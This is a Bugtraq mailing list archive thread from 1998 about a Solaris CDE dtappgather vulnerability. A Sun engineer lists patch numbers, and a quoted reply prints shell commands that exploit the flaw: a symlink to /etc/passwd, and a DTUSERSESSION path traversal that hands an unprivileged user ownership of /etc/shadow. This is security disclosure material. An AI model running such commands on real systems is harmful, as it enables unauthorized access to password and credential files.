Bugtraq mailing list archives

Re: /usr/dt/bin/dtappgather exploit

From: steven.goldberg () West Sun COM (Steven Goldberg - SE - Seattle WA)
Date: Wed, 25 Feb 1998 10:59:38 -0800


Hi,

Sun has published the following patches to address this
vulnerability:

patches  104497    CDE 1.0.1: dtappgather patch
patches  104498    CDE 1.0.2: dtappgather patch
patches  104499    CDE 1.0.1_x86: dtappgather patch
patches  104500    CDE 1.0.2_x86: dtappgather patch
patches  105837    CDE 1.2: dtappgather Patch
patches  105838    CDE 1.2_x86: dtappgather Patch


thanks,

Steve

--------------

Date: Tue, 24 Feb 1998 20:30:20 +0100
From: "J.A. Gutierrez" <spd () GTC1 CPS UNIZAR ES>
Subject: Re: /usr/dt/bin/dtappgather exploit
MIME-Version: 1.0
Content-Transfer-Encoding: 7BIT


        I suppose you have learnt about CERT's advisory on dtappgather
program. Well, here's the exploit:

nigg0r@host% ls -l /etc/passwd
-r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd
nigg0r@host% ln -s /etc/passwd

/var/dt/appconfig/appmanager/generic-display-0

nigg0r@host% dtappgather


    the exploit is much simpler than that.
        hey, it's even documented on the man page :-)

    Simply

    $ id
    uid=6969(foo) gid=666(bar)
    $ ls -l /etc/shadow
    -r--------   1 root     sys          234 Nov  7  1999 /etc/shadow
    $ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
    $ ls -l /etc/shadow
    -r-xr-xr-x   1 foo      bar          234 Nov  7  1999 /etc/shadow


    Anyway, your exploit has an advantage: it works (at least,
    in solaris 2.5), even after patching CDE according to CERT
    advisory.
    Solaris 2.6 seems to have the right permisions:

            /var/dt -> rwxr-xr-x
            /var/dt/appconfig -> rwxr-xr-x
            /var/dt/tmp -> rwxrwxrwt

--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)

Current thread:

/usr/dt/bin/dtappgather exploit Mastoras (Feb 23)
- Re: /usr/dt/bin/dtappgather exploit J.A. Gutierrez (Feb 24)
- AOL Instant Messanger Bug Aleph One (Feb 24)
- Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files kevingeo () CRUZIO COM (Feb 25)
  - Re: Quake 2 Linux 3.13 (and lower) allow users to read arbitrary William T Wilson (Feb 25)
- Quake 2 Linux 3.13 - ref_root.so still works kevingeo () CRUZIO COM (Feb 25)
- <Possible follow-ups>
- Re: /usr/dt/bin/dtappgather exploit Steven Goldberg - SE - Seattle WA (Feb 25)
  - Re: /usr/dt/bin/dtappgather exploit J.A. Gutierrez (Feb 25)